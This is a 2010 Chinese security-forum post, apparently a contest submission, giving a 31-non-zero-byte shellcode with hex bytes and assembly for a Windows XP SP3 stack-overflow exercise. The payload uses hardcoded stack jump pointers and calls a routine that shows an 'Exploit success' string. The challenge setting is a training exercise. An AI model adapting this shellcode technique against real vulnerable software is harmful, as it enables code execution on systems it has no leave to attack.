-
-
[原创]交卷,还是提交个稳定的版本吧
-
发表于: 2010-10-19 19:28 3126
-
太多硬编码不能行,过度追求字节数而不稳定这就违背了信息安全的主旨了,所以提交的这个答卷除了堆栈跳转不得不硬编码之外,其他都是偏移量,完全稳定,在Win XP SP3下通过
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针
共31个非零字节
堆栈基址是 0x00140000,如果是在堆栈基址是0x00130000的机器调试,需要修改两个跳转指针
dd xx xx xx 00 ;指针2 5a pop edx 6a 00 push 0 ff 72 57 push dword ptr [edx + 57] ;"ExploitMe" 83 c2 60 add edx, 0x60 ff d2 call edx dd 45 00 78 00 70 00 6c 00 6f 00 69 00 74 00 20 00 73 00 75 00 63 00 63 00 65 00 73 00 73 00 00 00 ;字符串 dd xx xx xx 00 ;指针1
共31个非零字节
赞赏
他的文章
- [原创]第一阶段 第二题 交卷了,网络有点问题啊 4170
- [原创]我也来发发第一题的解答 8235
- [原创]交卷,还是提交个稳定的版本吧 3127
- [原创]终于找到, Tilib 5.7 For Ida Pro下载 7272
看原图
赞赏
雪币:
留言: